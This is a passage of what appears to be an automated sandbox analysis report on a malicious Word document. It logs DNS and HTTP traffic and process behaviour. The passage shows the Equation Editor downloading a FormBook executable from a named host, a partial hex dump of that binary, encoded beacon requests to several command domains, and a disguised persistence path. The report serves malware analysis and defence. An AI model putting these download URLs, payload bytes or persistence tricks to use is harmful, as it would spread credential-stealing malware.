                                                                                                                                                            Nov 26, 2020 08:44:07.298772097 CET4916780192.168.2.22104.168.198.45
                                                                                                                                                            Nov 26, 2020 08:44:07.298784971 CET8049167104.168.198.45192.168.2.22

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 26, 2020 08:44:06.484982967 CET5219753192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:44:06.529192924 CET53521978.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:54.203960896 CET5309953192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:45:54.245131016 CET53530998.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:45:59.259130001 CET5283853192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:45:59.604048014 CET53528388.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:04.984123945 CET6120053192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET53612008.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:10.570633888 CET4954853192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:46:10.610701084 CET53495488.8.8.8192.168.2.22
                                                                                                                                                            Nov 26, 2020 08:46:29.466934919 CET5562753192.168.2.228.8.8.8
                                                                                                                                                            Nov 26, 2020 08:46:29.508364916 CET53556278.8.8.8192.168.2.22

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                            Nov 26, 2020 08:44:06.484982967 CET192.168.2.228.8.8.80x26d4Standard query (0)sea-shared-5.masterns.comA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:45:54.203960896 CET192.168.2.228.8.8.80xccffStandard query (0)www.musmarservices.comA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:45:59.259130001 CET192.168.2.228.8.8.80x2e78Standard query (0)www.opel-occasions-ales.comA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:04.984123945 CET192.168.2.228.8.8.80x2f03Standard query (0)www.runwithit.mediaA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:10.570633888 CET192.168.2.228.8.8.80x3c4eStandard query (0)www.mycapecrusade.comA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:29.466934919 CET192.168.2.228.8.8.80x6ec7Standard query (0)www.akasyaofistasima.comA (IP address)IN (0x0001)

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                            Nov 26, 2020 08:44:06.529192924 CET8.8.8.8192.168.2.220x26d4No error (0)sea-shared-5.masterns.com104.168.198.45A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:45:54.245131016 CET8.8.8.8192.168.2.220xccffName error (3)www.musmarservices.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:45:59.604048014 CET8.8.8.8192.168.2.220x2e78No error (0)www.opel-occasions-ales.com50.117.11.156A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)www.runwithit.mediaext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)ext-sq.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)ext-sq.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)ext-sq.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:05.025748014 CET8.8.8.8192.168.2.220x2f03No error (0)ext-sq.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:10.610701084 CET8.8.8.8192.168.2.220x3c4eNo error (0)www.mycapecrusade.commycapecrusade.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:10.610701084 CET8.8.8.8192.168.2.220x3c4eNo error (0)mycapecrusade.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:29.508364916 CET8.8.8.8192.168.2.220x6ec7No error (0)www.akasyaofistasima.comakasyaofistasima.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                            Nov 26, 2020 08:46:29.508364916 CET8.8.8.8192.168.2.220x6ec7No error (0)akasyaofistasima.com89.252.180.207A (IP address)IN (0x0001)

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • sea-shared-5.masterns.com
                                                                                                                                                            • www.opel-occasions-ales.com
                                                                                                                                                            • www.runwithit.media
                                                                                                                                                            • www.mycapecrusade.com

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.2249167104.168.198.4580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 26, 2020 08:44:06.720232010 CET0OUTGET /~vhlcnlog/ugopoundx/skypoundx.exe HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                            Host: sea-shared-5.masterns.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Nov 26, 2020 08:44:06.900933027 CET2INHTTP/1.1 200 OK
                                                                                                                                                            Date: Thu, 26 Nov 2020 07:44:06 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                                                            Last-Modified: Thu, 26 Nov 2020 01:10:37 GMT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 278528
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Keep-Alive: timeout=5, max=10000
                                                                                                                                                            Content-Type: application/x-msdownload
                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c ff be 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 f2 03 00 00 4c 00 00 00 00 00 00 be 10 04 00 00 20 00 00 00 20 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 10 04 00 57 00 00 00 00 20 04 00 38 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 f0 03 00 00 20 00 00 00 f2 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 38 49 00 00 00 20 04 00 00 4a 00 00 00 f4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 04 00 00 02 00 00 00 3e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 10 04 00 00 00 00 00 48 00 00 00 02 00 05 00 6c ed 03 00 f8 22 00 00 03 00 00 00 43 00 00 06 e8 30 00 00 84 bc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 17 1e 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 1d 00 00 00 00 00 00 00 73 01 00 00 06 28 14 00 00 0a 74 02 00 00 02 1e 2d 03 26 2b 07 80 01 00 00 04 2b 00 2a 00 00 00 1a 7e 01 00 00 04 2a 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 1d 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 19 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1a 1b 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 18 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 1a 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 18 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1c 1e 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 17 1d 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1e 16 2c 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 1d 17 2d 08 26 28 15 00 00 0a 2b 03 26 2b f6 2a 00 00
                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL\_L @ @dW 8I H.text `.rsrc8I J@@.reloc>@BHl"C00-&(+&+*0s(t-&++*~*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0-&(+&+*0,&(+&+*0-&(+&+*


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.224916850.117.11.15680C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 26, 2020 08:45:59.790648937 CET294OUTGET /bu43/?OBZPd=k6AhchXHBB&Yzrx=UiBHsTvAEQLKMdFr/hj1g9PdhtcWl8ZZ/ysXuG6Tr8ng0KhPmhT7mwdkGkewJ6JbNyjYEA== HTTP/1.1
                                                                                                                                                            Host: www.opel-occasions-ales.com
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii:
                                                                                                                                                            Nov 26, 2020 08:45:59.969166994 CET295INHTTP/1.1 200 OK
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                                            X-Powered-By: Nginx
                                                                                                                                                            Date: Thu, 26 Nov 2020 07:45:58 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                                                            Data Ascii: 3


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.2249169198.49.23.14180C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 26, 2020 08:46:05.157809019 CET300OUTGET /bu43/?Yzrx=5vpVtqJ3i14TYLjahre3JpaYS6Wcf4IPAkG7pj5paeEEzi6lwzUZWwRsk9qYR19+9CpDRA==&OBZPd=k6AhchXHBB HTTP/1.1
                                                                                                                                                            Host: www.runwithit.media
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii:
                                                                                                                                                            Nov 26, 2020 08:46:05.290102005 CET301INHTTP/1.1 400 Bad Request
                                                                                                                                                            content-length: 77564
                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                            pragma: no-cache
                                                                                                                                                            cache-control: no-cache, must-revalidate
                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                            connection: close
                                                                                                                                                            date: Thu, 26 Nov 2020 07:46:05 UTC
                                                                                                                                                            x-contextid: nUrUpo0O/0htnjK7R
                                                                                                                                                            server: Squarespace
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                                                                                                            Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.224917034.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 26, 2020 08:46:10.629771948 CET381OUTGET /bu43/?OBZPd=k6AhchXHBB&Yzrx=5Lfh6qcZO6QCpL41ah3mk8LUL3OJ/OZx9c26bzra2u0GgF5XtbJN8WKHQCrI7u2LEBkhnA== HTTP/1.1
                                                                                                                                                            Host: www.mycapecrusade.com
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                            Data Ascii:
                                                                                                                                                            Nov 26, 2020 08:46:10.744771957 CET382INHTTP/1.1 403 Forbidden
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Thu, 26 Nov 2020 07:46:10 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 275
                                                                                                                                                            ETag: "5fb7c734-113"
                                                                                                                                                            Via: 1.1 google
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                            Code Manipulations

                                                                                                                                                            Statistics

                                                                                                                                                            Behavior

                                                                                                                                                            Click to jump to process

                                                                                                                                                            System Behavior

                                                                                                                                                            Analysis Process: WINWORD.EXE PID: 1776 Parent PID: 584

                                                                                                                                                            General

                                                                                                                                                            Start time:08:43:37
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                            Imagebase:0x13fda0000
                                                                                                                                                            File size:1424032 bytes
                                                                                                                                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Analysis Process: EQNEDT32.EXE PID: 2372 Parent PID: 584

                                                                                                                                                            General

                                                                                                                                                            Start time:08:43:38
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:543304 bytes
                                                                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Analysis Process: skypound83892.exe PID: 1520 Parent PID: 2372

                                                                                                                                                            General

                                                                                                                                                            Start time:08:43:40
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Imagebase:0x90000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            Reputation:low

                                                                                                                                                            Analysis Process: EQNEDT32.EXE PID: 2804 Parent PID: 584

                                                                                                                                                            General

                                                                                                                                                            Start time:08:43:59
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:543304 bytes
                                                                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high

                                                                                                                                                            Analysis Process: skypound83892.exe PID: 960 Parent PID: 1520

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:02
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\skypound83892.exe
                                                                                                                                                            Imagebase:0x90000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                            Reputation:low

                                                                                                                                                            Analysis Process: explorer.exe PID: 1388 Parent PID: 960

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:04
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:
                                                                                                                                                            Imagebase:0xffca0000
                                                                                                                                                            File size:3229696 bytes
                                                                                                                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate

                                                                                                                                                            Analysis Process: firefos.exe PID: 2992 Parent PID: 1388

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:18
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML

                                                                                                                                                            Analysis Process: firefos.exe PID: 2872 Parent PID: 1388

                                                                                                                                                            General

                                                                                                                                                            Start time:08:44:26
                                                                                                                                                            Start date:26/11/2020
                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                            File size:278528 bytes
                                                                                                                                                            MD5 hash:EF8FC92D8B47C1F40DD5233AA9B3F260
                                                                                                                                                            Has elevated privileges:true
